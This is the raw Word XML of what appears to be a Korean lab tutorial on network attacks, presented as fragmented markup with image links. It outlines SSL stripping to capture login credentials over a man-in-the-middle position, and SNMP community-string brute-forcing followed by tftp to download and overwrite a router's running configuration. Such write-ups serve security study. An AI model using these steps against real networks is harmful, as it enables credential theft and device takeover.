            <wp:docPr id="108" name="그림 108" descr="https://lh4.googleusercontent.com/7LvD6Qj1cODS_BrQud3a3-FhplHz-f4h5Ao_N86EiFdEHRmEBB3Neb8nlzZLgqRd1x2fA_jN2a6awAxig6FHSv3IEMS8U2g-lRlG8pTe3ubk1AksNxhWbKex3TmrCbfpUx0pyF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h4.googleusercontent.com/7LvD6Qj1cODS_BrQud3a3-FhplHz-f4h5Ao_N86EiFdEHRmEBB3Neb8nlzZLgqRd1x2fA_jN2a6awAxig6FHSv3IEMS8U2g-lRlG8pTe3ubk1AksNxhWbKex3TmrCbfpUx0pyFbX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424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="109" name="그림 109" descr="https://lh6.googleusercontent.com/ORvtO_1J0BDkBBn_Jordq4kJCxKkzxaTaTQptBw_xRQoiBMKCH21rAUAS0EP7DoQNB4Z4gG-dT1ETcDrilv2lwEFS57H6MxxP0KgVjpdE9VFnZmQFR5jjgOuGQs-bne2Lu7o0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h6.googleusercontent.com/ORvtO_1J0BDkBBn_Jordq4kJCxKkzxaTaTQptBw_xRQoiBMKCH21rAUAS0EP7DoQNB4Z4gG-dT1ETcDrilv2lwEFS57H6MxxP0KgVjpdE9VFnZmQFR5jjgOuGQs-bne2Lu7o0C1A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공격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앞서</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TL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제대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작동하는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S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SL </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">strip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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위한</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sslstrip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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설치</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:ind w:left="80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02180" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="110" name="그림 110" descr="https://lh4.googleusercontent.com/eX5tyRh6GaPYuNxtkTRIVUs36vt_p5Gvm5c9Pnawy1kWbBAqUNq1E9WTpQbrjsSurQnRQ6AnCsDsEy5VOXm0gowBoas7M9enYLhh4r1aP9Ityq3LeTb2OBsf7bqrbPtOg261Se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h4.googleusercontent.com/eX5tyRh6GaPYuNxtkTRIVUs36vt_p5Gvm5c9Pnawy1kWbBAqUNq1E9WTpQbrjsSurQnRQ6AnCsDsEy5VOXm0gowBoas7M9enYLhh4r1aP9Ityq3LeTb2OBsf7bqrbPtOg261Sepj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70760" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111" name="그림 111" descr="https://lh4.googleusercontent.com/0YeSixLJoljmks9Yu3nCPZFUSrnvou_jVRKdV2q9h24s5QBc08R98noTdai24OTZgfdOsIDVLNue4yfP7Qmd_1QHABxYUTL_JfoUss-1ijI3BfVxKiHhJQQVpQe6hT1SkLiVx4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h4.googleusercontent.com/0YeSixLJoljmks9Yu3nCPZFUSrnvou_jVRKdV2q9h24s5QBc08R98noTdai24OTZgfdOsIDVLNue4yfP7Qmd_1QHABxYUTL_JfoUss-1ijI3BfVxKiHhJQQVpQe6hT1SkLiVx4aq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F524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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에</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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만들고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80</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>번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포트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10000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>번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포트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R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>edirect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키겠다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방화벽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설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524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>
            <wp:extent cx="2278380" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="112" name="그림 112" descr="https://lh5.googleusercontent.com/AK2-kItmOzfpGHZnGu7ZIu6JVXrb6sW3EuX8i1y-ELcjvLNPUHNCtV4NbgofhwWE9Wz7OQaE8BgbygZjaUvU8PYDOfoeebILb2v2HXfkf36bxkSyNIaN-TN1ZOKwg7Vxnz93vh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lh5.googleusercontent.com/AK2-kItmOzfpGHZnGu7ZIu6JVXrb6sW3EuX8i1y-ELcjvLNPUHNCtV4NbgofhwWE9Wz7OQaE8BgbygZjaUvU8PYDOfoeebILb2v2HXfkf36bxkSyNIaN-TN1ZOKwg7Vxnz93vhWJ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 xml:space="preserve">Sslstrip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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실행</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>옵션으로</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>포트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들어오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요청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대해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도록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설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:ind w:left="80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40280" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="113" name="그림 113" descr="https://lh4.googleusercontent.com/O473fURzCpO7ePGWsNGM_oX3fFvxGW-h_VlAQnXV8LAfWhbdPUDrpFJ-KAkFRv3y4KtBAyRngVqjPxaeVlrn1S_kD-ihmfiAXAPY6cK37KNITygB_Y_Ax8G5redjZtp3qFC18q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h4.googleusercontent.com/O473fURzCpO7ePGWsNGM_oX3fFvxGW-h_VlAQnXV8LAfWhbdPUDrpFJ-KAkFRv3y4KtBAyRngVqjPxaeVlrn1S_kD-ihmfiAXAPY6cK37KNITygB_Y_Ax8G5redjZtp3qFC18qie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24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308860" cy="1303020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114" name="그림 114" descr="https://lh5.googleusercontent.com/VDnpQYGAuNdRMTv4hkIMRBiclUu8GdVV1tXJnv5GAGTf51L1GTURJDfk5G6n0MJnVD0jesqdlcNL1DbwsHCzaRdm-ejUOcRJuaDzCUHa_ept7gT7LyoH2zi-3dmRIZESV1EHAyI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h5.googleusercontent.com/VDnpQYGAuNdRMTv4hkIMRBiclUu8GdVV1tXJnv5GAGTf51L1GTURJDfk5G6n0MJnVD0jesqdlcNL1DbwsHCzaRdm-ejUOcRJuaDzCUHa_ept7gT7LyoH2zi-3dmRIZESV1EHAyI-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P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웹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http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아닌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것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로그온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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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78380" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="115" name="그림 115" descr="https://lh5.googleusercontent.com/OdaHZv1shQXr0shvPbEXFvFbTzYkj6yOvhuF2pr50AaRCHOMvXHzga122P7W0Ad1S8xL03bej6ae95wZGJXelh-8ysZkf6x0hFZj9VIOP-28xdHtv0POBPMAVwFhSiayTkh3UT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h5.googleusercontent.com/OdaHZv1shQXr0shvPbEXFvFbTzYkj6yOvhuF2pr50AaRCHOMvXHzga122P7W0Ad1S8xL03bej6ae95wZGJXelh-8ysZkf6x0hFZj9VIOP-28xdHtv0POBPMAVwFhSiayTkh3UTW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B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 돌아와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wire Shark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 확인해보면 아이디와 비밀번호가 노출된 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRPr="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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 w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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25040" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="116" name="그림 116" descr="https://lh4.googleusercontent.com/4VZzuAAXvLtriz7smnOQJiq6eh12g-seQqRSKWWx9pi6XFeKrBqDkMLZHGR10JGiWB_SInsebb0dedXGUnOuVezxMvAE5myKf5J60TE7A3gm_PjDd1BHrga7SddR6a9RciwGP4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h4.googleusercontent.com/4VZzuAAXvLtriz7smnOQJiq6eh12g-seQqRSKWWx9pi6XFeKrBqDkMLZHGR10JGiWB_SInsebb0dedXGUnOuVezxMvAE5myKf5J60TE7A3gm_PjDd1BHrga7SddR6a9RciwGP4fv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194560" cy="1287780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="117" name="그림 117" descr="https://lh3.googleusercontent.com/D5CAIHUxeqgOGH3EJihB63lW0X2BhOp7_TfRc7s7BfSOQ9uVhkbWK-8QtzrksUsqmeRU6k6MyFs3Z_3wviMQebSC-pxWhpq-0zEHvK3S6rOJYCVGyEYijEdZtnODwhEopuxnq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h3.googleusercontent.com/D5CAIHUxeqgOGH3EJihB63lW0X2BhOp7_TfRc7s7BfSOQ9uVhkbWK-8QtzrksUsqmeRU6k6MyFs3Z_3wviMQebSC-pxWhpq-0zEHvK3S6rOJYCVGyEYijEdZtnODwhEopuxnqfB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6024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격에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앞서</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> snmp</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서비스를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지원해주는지</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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사용해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확인</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>후</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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Community String</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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알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오기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위해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사용할</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dictionary </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일인</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dict.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:ind w:left="800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>
            <wp:extent cx="2240280" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="118" name="그림 118" descr="https://lh6.googleusercontent.com/bLQ7CW2Z9OlerxRIcvipzgtVe0ATWyAZNfD3Rlq4bGYpE9OvYtsyyuPm_1YXTJiBsHwr3nKcVUu3xtroff1FMha8UnxXQcsWgn3mlmKPIEbEwG_6KgT26Ruc8i5kOvTa1inSgS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h6.googleusercontent.com/bLQ7CW2Z9OlerxRIcvipzgtVe0ATWyAZNfD3Rlq4bGYpE9OvYtsyyuPm_1YXTJiBsHwr3nKcVUu3xtroff1FMha8UnxXQcsWgn3mlmKPIEbEwG_6KgT26Ruc8i5kOvTa1inSgSVz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 xml:space="preserve">Onesixtyone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴과</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dict.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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사용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대상의</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Community String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>알아오기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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40280" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="119" name="그림 119" descr="https://lh6.googleusercontent.com/RlA6oNXQ7_uJOT7LvdyoPzIy9ZGiC0p0KbjuJA26K2uhHJLdCaS5ZByypq6Z4Zlz1A-C2no8nq93bcCAgwJIz46C2m_IwyMhWpNKzfid1fjEVGOcWvcMWkxLT7aBWp3-0dQRu6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h6.googleusercontent.com/RlA6oNXQ7_uJOT7LvdyoPzIy9ZGiC0p0KbjuJA26K2uhHJLdCaS5ZByypq6Z4Zlz1A-C2no8nq93bcCAgwJIz46C2m_IwyMhWpNKzfid1fjEVGOcWvcMWkxLT7aBWp3-0dQRu6W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17420" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="120" name="그림 120" descr="https://lh5.googleusercontent.com/Ut2z5yIDeBiyciMVB0cpZvjBHdH7BY2e9YqRl-KYFCIt0rNu8qSa8DVE9uQ1kHm6WirAL5YbpDgEKNYSA6U6QE1SayMpUSOOxQnarIFHSNh7jpF0f4Y0nARMWhFx_qYa4hqx9dP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h5.googleusercontent.com/Ut2z5yIDeBiyciMVB0cpZvjBHdH7BY2e9YqRl-KYFCIt0rNu8qSa8DVE9uQ1kHm6WirAL5YbpDgEKNYSA6U6QE1SayMpUSOOxQnarIFHSNh7jpF0f4Y0nARMWhFx_qYa4hqx9dP_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공격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하기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해</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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실행하고</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> up_running_config, copy_running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파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</w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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25040" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="121" name="그림 121" descr="https://lh4.googleusercontent.com/zvYIcVf0YfcBiUYXzrJu09_eFBrIS4gDxSqne5iIgx-Z1VK0YXS8B_TLqXxJ9SF49HjY4dufU4KBvtsrRtS6gjBCor1NTqY7QHHt26Ag02mqNeQPPP72Yd4zAoHogLx4Fu2DBA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h4.googleusercontent.com/zvYIcVf0YfcBiUYXzrJu09_eFBrIS4gDxSqne5iIgx-Z1VK0YXS8B_TLqXxJ9SF49HjY4dufU4KBvtsrRtS6gjBCor1NTqY7QHHt26Ag02mqNeQPPP72Yd4zAoHogLx4Fu2DBAyz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40280" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="122" name="그림 122" descr="https://lh6.googleusercontent.com/z4DpcdSJeLI9zXtAbjuASSKuO-uR2w4ixyPibxCiX5DE7Nan0taSwA4jJUuoXS3bX2kmT17E38-mzXwa0irJjeIEdFRSoE5RTCxWeg_K83ByOCWn4ATy1gyOfAwf13iJzeBps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h6.googleusercontent.com/z4DpcdSJeLI9zXtAbjuASSKuO-uR2w4ixyPibxCiX5DE7Nan0taSwA4jJUuoXS3bX2kmT17E38-mzXwa0irJjeIEdFRSoE5RTCxWeg_K83ByOCWn4ATy1gyOfAwf13iJzeBpsESk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 xml:space="preserve">Copy_running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일과</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용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공격대상의</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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파일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받</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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받아왔는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</w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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17420" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="123" name="그림 123" descr="https://lh4.googleusercontent.com/gZLYPyihpVAFMW1HxCSycKqQmpJ2TXRARsRZC6Z-gQVcMTpPIWDie9HOc848XgQVVBqgCJ2fdwmQXuFrHDynJTZdV2pMhAkaN6cEd63jtghIsXNpsmuBo7XoGT5lU0t7rdjmbZ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lh4.googleusercontent.com/gZLYPyihpVAFMW1HxCSycKqQmpJ2TXRARsRZC6Z-gQVcMTpPIWDie9HOc848XgQVVBqgCJ2fdwmQXuFrHDynJTZdV2pMhAkaN6cEd63jtghIsXNpsmuBo7XoGT5lU0t7rdjmbZM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55520" cy="1516380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="124" name="그림 124" descr="https://lh5.googleusercontent.com/Gbm2_1wYDz8fjudLguWEoOjWrBmmX7c4NTkv4w-5FWf23sMgiIklHXKsaCMz0s3wjPH13aKg83s0T1t1kDMf-ly5nC8jBpz4mvBW-Kz6aT3BgGLufpcsPmO6uwF8uU4kxYtE_5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lh5.googleusercontent.com/Gbm2_1wYDz8fjudLguWEoOjWrBmmX7c4NTkv4w-5FWf23sMgiIklHXKsaCMz0s3wjPH13aKg83s0T1t1kDMf-ly5nC8jBpz4mvBW-Kz6aT3BgGLufpcsPmO6uwF8uU4kxYtE_5Pq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6024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>받아온</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> running_config </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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확인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바꾸고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싶은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내용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파일로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만들</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>고</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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 xml:space="preserve">Up_running_config </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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이용해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만든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공격파일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공격대상에게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보내기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:ind w:left="80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lastRenderedPageBreak/>
        <w:drawing>
